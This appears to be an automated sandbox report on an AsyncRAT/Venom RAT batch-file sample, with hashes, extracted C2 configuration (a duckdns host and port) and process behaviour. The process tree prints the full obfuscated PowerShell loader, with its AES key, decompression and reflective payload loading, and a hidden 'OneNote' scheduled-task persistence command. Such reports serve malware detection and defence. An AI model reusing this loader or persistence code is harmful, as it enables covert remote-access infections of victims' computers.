asyncrat | b3c5e464e43d7db2432f3e28de75bd0eee8fa7a2b7b6fef7134e7115d6681be3

Analysis

max time kernel
148s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
25-03-2024 14:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$RECYCLE.BIN/$RAH62O0.cmd
Size

111KB
MD5

2c3351c659a42a82e3a3d865c88eaaaf
SHA1

7c73b2c98e449be1c5a85806c08cfe05c0a699ab
SHA256

f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4
SHA512

b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6
SSDEEP

3072:hXiSJ9Nvg6aGNGIR9Lb5ZQ6gvr+sBKWTP8ydL:hnXy2wg9f5ZezrKWTPdV

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

kdfsv.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral20/memory/3064-135-0x0000025AC75C0000-0x0000025AC75D6000-memory.dmp	family_asyncrat

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

46 3064 powershell.exe
114 3064 powershell.exe
131 3064 powershell.exe
151 3064 powershell.exe
196 3064 powershell.exe

flow	pid	process
46	3064	powershell.exe
114	3064	powershell.exe
131	3064	powershell.exe
151	3064	powershell.exe
196	3064	powershell.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2812	powershell.exe
2812	powershell.exe
2344	powershell.exe
2344	powershell.exe
4412	powershell.exe
4412	powershell.exe
2788	powershell.exe
2788	powershell.exe
3064	powershell.exe
3064	powershell.exe
3064	powershell.exe
3448	powershell.exe
3448	powershell.exe
3448	powershell.exe
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
5052	powershell.exe
5052	powershell.exe
5052	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeIncreaseQuotaPrivilege	4412	powershell.exe
Token: SeSecurityPrivilege	4412	powershell.exe
Token: SeTakeOwnershipPrivilege	4412	powershell.exe
Token: SeLoadDriverPrivilege	4412	powershell.exe
Token: SeSystemProfilePrivilege	4412	powershell.exe
Token: SeSystemtimePrivilege	4412	powershell.exe
Token: SeProfSingleProcessPrivilege	4412	powershell.exe
Token: SeIncBasePriorityPrivilege	4412	powershell.exe
Token: SeCreatePagefilePrivilege	4412	powershell.exe
Token: SeBackupPrivilege	4412	powershell.exe
Token: SeRestorePrivilege	4412	powershell.exe
Token: SeShutdownPrivilege	4412	powershell.exe
Token: SeDebugPrivilege	4412	powershell.exe
Token: SeSystemEnvironmentPrivilege	4412	powershell.exe
Token: SeRemoteShutdownPrivilege	4412	powershell.exe
Token: SeUndockPrivilege	4412	powershell.exe
Token: SeManageVolumePrivilege	4412	powershell.exe
Token: 33	4412	powershell.exe
Token: 34	4412	powershell.exe
Token: 35	4412	powershell.exe
Token: 36	4412	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeIncreaseQuotaPrivilege	2788	powershell.exe
Token: SeSecurityPrivilege	2788	powershell.exe
Token: SeTakeOwnershipPrivilege	2788	powershell.exe
Token: SeLoadDriverPrivilege	2788	powershell.exe
Token: SeSystemProfilePrivilege	2788	powershell.exe
Token: SeSystemtimePrivilege	2788	powershell.exe
Token: SeProfSingleProcessPrivilege	2788	powershell.exe
Token: SeIncBasePriorityPrivilege	2788	powershell.exe
Token: SeCreatePagefilePrivilege	2788	powershell.exe
Token: SeBackupPrivilege	2788	powershell.exe
Token: SeRestorePrivilege	2788	powershell.exe
Token: SeShutdownPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeSystemEnvironmentPrivilege	2788	powershell.exe
Token: SeRemoteShutdownPrivilege	2788	powershell.exe
Token: SeUndockPrivilege	2788	powershell.exe
Token: SeManageVolumePrivilege	2788	powershell.exe
Token: 33	2788	powershell.exe
Token: 34	2788	powershell.exe
Token: 35	2788	powershell.exe
Token: 36	2788	powershell.exe
Token: SeIncreaseQuotaPrivilege	2788	powershell.exe
Token: SeSecurityPrivilege	2788	powershell.exe
Token: SeTakeOwnershipPrivilege	2788	powershell.exe
Token: SeLoadDriverPrivilege	2788	powershell.exe
Token: SeSystemProfilePrivilege	2788	powershell.exe
Token: SeSystemtimePrivilege	2788	powershell.exe
Token: SeProfSingleProcessPrivilege	2788	powershell.exe
Token: SeIncBasePriorityPrivilege	2788	powershell.exe
Token: SeCreatePagefilePrivilege	2788	powershell.exe
Token: SeBackupPrivilege	2788	powershell.exe
Token: SeRestorePrivilege	2788	powershell.exe
Token: SeShutdownPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeSystemEnvironmentPrivilege	2788	powershell.exe
Token: SeRemoteShutdownPrivilege	2788	powershell.exe
Token: SeUndockPrivilege	2788	powershell.exe
Token: SeManageVolumePrivilege	2788	powershell.exe
Token: 33	2788	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1480 wrote to memory of 3584	1480	cmd.exe	cmd.exe
PID 1480 wrote to memory of 3584	1480	cmd.exe	cmd.exe
PID 1480 wrote to memory of 704	1480	cmd.exe	cmd.exe
PID 1480 wrote to memory of 704	1480	cmd.exe	cmd.exe
PID 704 wrote to memory of 4740	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 4740	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 3644	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 3644	704	cmd.exe	cmd.exe
PID 704 wrote to memory of 2812	704	cmd.exe	powershell.exe
PID 704 wrote to memory of 2812	704	cmd.exe	powershell.exe
PID 2812 wrote to memory of 2344	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 2344	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4412	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4412	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 2788	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 2788	2812	powershell.exe	powershell.exe
PID 2812 wrote to memory of 4440	2812	powershell.exe	cmd.exe
PID 2812 wrote to memory of 4440	2812	powershell.exe	cmd.exe
PID 4440 wrote to memory of 4004	4440	cmd.exe	cmd.exe
PID 4440 wrote to memory of 4004	4440	cmd.exe	cmd.exe
PID 4004 wrote to memory of 4812	4004	cmd.exe	cmd.exe
PID 4004 wrote to memory of 4812	4004	cmd.exe	cmd.exe
PID 4004 wrote to memory of 2348	4004	cmd.exe	cmd.exe
PID 4004 wrote to memory of 2348	4004	cmd.exe	cmd.exe
PID 4004 wrote to memory of 3064	4004	cmd.exe	powershell.exe
PID 4004 wrote to memory of 3064	4004	cmd.exe	powershell.exe
PID 3064 wrote to memory of 3448	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 3448	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 2988	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 2988	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 5052	3064	powershell.exe	powershell.exe
PID 3064 wrote to memory of 5052	3064	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1480
- C:\Windows\system32\cmd.exe
  cmd /c \"set __=^&rem\
  2⤵
  PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:704
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "
    3⤵
    PID:3644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0')
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 58579' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2788
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4004
      - C:\Windows\system32\cmd.exe
        
        cmd /c \"set __=^&rem\
        6⤵
        
        PID:4812
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "
        6⤵
        
        PID:2348
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 58579' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5052

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4e0c5f8260faa39b76918042e9c24446

SHA1
be4bcf9c27cdca33a2f4490dc025e61e04961762

SHA256
ba2030346326fe600507672662ff56712179fb1c7723fd2234744cbc9644e423

SHA512
ef03f1aeca9c72c16cda3b8aa345a45d74bcbecee3233ad616674b1e297fe3e083163da4f6a6264bb3a12962cb73a37760a30f8adbe4793fab851934df0e80ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4373abae4880a277a3859f5734143a19

SHA1
a71759a565541fba5e1ee8d3fceee7645ed75054

SHA256
f151ef7e7996f479ba2ab9334d50ff36ae85917c4451614a254b121d328eb607

SHA512
0af72c0f2ff8716e99a84e67ef4bb921e389459b90f76ca17340384aabcdf41a10c2191801c8d343b649cb547ea8182ca367b7aa6176d7304394be4b9bfe8718

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a8c1ef4d60201112bef699b1f57df70

SHA1
6a5fed4208f14dcec7f760c532d8bff29e1cdbd8

SHA256
f800f058170cc700372c3a364c5ba3b6d2c91fb5369fbab3362915937869b2f5

SHA512
339f88ebf5026548795a0624e23606b4de439995ae14d38ce8ae66fd9154a5751d17f6c51b7d5c2a93a4d52e051fb0184a6fc4e85f9607d11fb02d538305ea9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uicuwakv.02g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\strt.cmd

Filesize
111KB

MD5
2c3351c659a42a82e3a3d865c88eaaaf

SHA1
7c73b2c98e449be1c5a85806c08cfe05c0a699ab

SHA256
f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4

SHA512
b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6

Download Submit
memory/2344-31-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2344-25-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2344-26-0x000002928ACA0000-0x000002928ACB0000-memory.dmp

Filesize
64KB

Download
memory/2344-27-0x000002928ACA0000-0x000002928ACB0000-memory.dmp

Filesize
64KB

Download
memory/2344-28-0x000002928ACA0000-0x000002928ACB0000-memory.dmp

Filesize
64KB

Download
memory/2788-51-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2788-52-0x00000112F9F90000-0x00000112F9FA0000-memory.dmp

Filesize
64KB

Download
memory/2788-63-0x00000112F9F90000-0x00000112F9FA0000-memory.dmp

Filesize
64KB

Download
memory/2788-65-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-33-0x00007FF92F110000-0x00007FF92F305000-memory.dmp

Filesize
2.0MB

Download
memory/2812-35-0x0000028D9A890000-0x0000028D9A8A0000-memory.dmp

Filesize
64KB

Download
memory/2812-34-0x00007FF92E6A0000-0x00007FF92E75E000-memory.dmp

Filesize
760KB

Download
memory/2812-84-0x0000028D986C0000-0x0000028D986D0000-memory.dmp

Filesize
64KB

Download
memory/2812-32-0x0000028D9A880000-0x0000028D9A894000-memory.dmp

Filesize
80KB

Download
memory/2812-86-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-15-0x0000028E00150000-0x0000028E001C6000-memory.dmp

Filesize
472KB

Download
memory/2812-14-0x0000028E00080000-0x0000028E000C4000-memory.dmp

Filesize
272KB

Download
memory/2812-13-0x0000028D986C0000-0x0000028D986D0000-memory.dmp

Filesize
64KB

Download
memory/2812-12-0x0000028D986C0000-0x0000028D986D0000-memory.dmp

Filesize
64KB

Download
memory/2812-11-0x0000028D986C0000-0x0000028D986D0000-memory.dmp

Filesize
64KB

Download
memory/2812-10-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-0-0x0000028E00000000-0x0000028E00022000-memory.dmp

Filesize
136KB

Download
memory/2812-80-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2812-83-0x0000028D986C0000-0x0000028D986D0000-memory.dmp

Filesize
64KB

Download
memory/2988-114-0x000001F3049E0000-0x000001F3049F0000-memory.dmp

Filesize
64KB

Download
memory/2988-112-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2988-118-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/2988-116-0x000001F3049E0000-0x000001F3049F0000-memory.dmp

Filesize
64KB

Download
memory/2988-113-0x000001F3049E0000-0x000001F3049F0000-memory.dmp

Filesize
64KB

Download
memory/3064-101-0x00007FF92F110000-0x00007FF92F305000-memory.dmp

Filesize
2.0MB

Download
memory/3064-138-0x0000025AAC630000-0x0000025AAC640000-memory.dmp

Filesize
64KB

Download
memory/3064-137-0x0000025AAC630000-0x0000025AAC640000-memory.dmp

Filesize
64KB

Download
memory/3064-82-0x0000025AAC630000-0x0000025AAC640000-memory.dmp

Filesize
64KB

Download
memory/3064-121-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/3064-102-0x00007FF92E6A0000-0x00007FF92E75E000-memory.dmp

Filesize
760KB

Download
memory/3064-139-0x00007FF92F110000-0x00007FF92F305000-memory.dmp

Filesize
2.0MB

Download
memory/3064-141-0x00007FF92F110000-0x00007FF92F305000-memory.dmp

Filesize
2.0MB

Download
memory/3064-136-0x0000025AAC630000-0x0000025AAC640000-memory.dmp

Filesize
64KB

Download
memory/3064-135-0x0000025AC75C0000-0x0000025AC75D6000-memory.dmp

Filesize
88KB

Download
memory/3064-85-0x0000025AAC630000-0x0000025AAC640000-memory.dmp

Filesize
64KB

Download
memory/3064-81-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/3448-100-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/3448-95-0x000001C16CFE0000-0x000001C16CFF0000-memory.dmp

Filesize
64KB

Download
memory/3448-88-0x000001C16CFE0000-0x000001C16CFF0000-memory.dmp

Filesize
64KB

Download
memory/3448-87-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/4412-46-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/4412-47-0x000001BE8F140000-0x000001BE8F150000-memory.dmp

Filesize
64KB

Download
memory/4412-48-0x000001BE8F140000-0x000001BE8F150000-memory.dmp

Filesize
64KB

Download
memory/4412-50-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/5052-120-0x00000207F84D0000-0x00000207F84E0000-memory.dmp

Filesize
64KB

Download
memory/5052-119-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download
memory/5052-132-0x00000207F84D0000-0x00000207F84E0000-memory.dmp

Filesize
64KB

Download
memory/5052-134-0x00007FF910810000-0x00007FF9112D1000-memory.dmp

Filesize
10.8MB

Download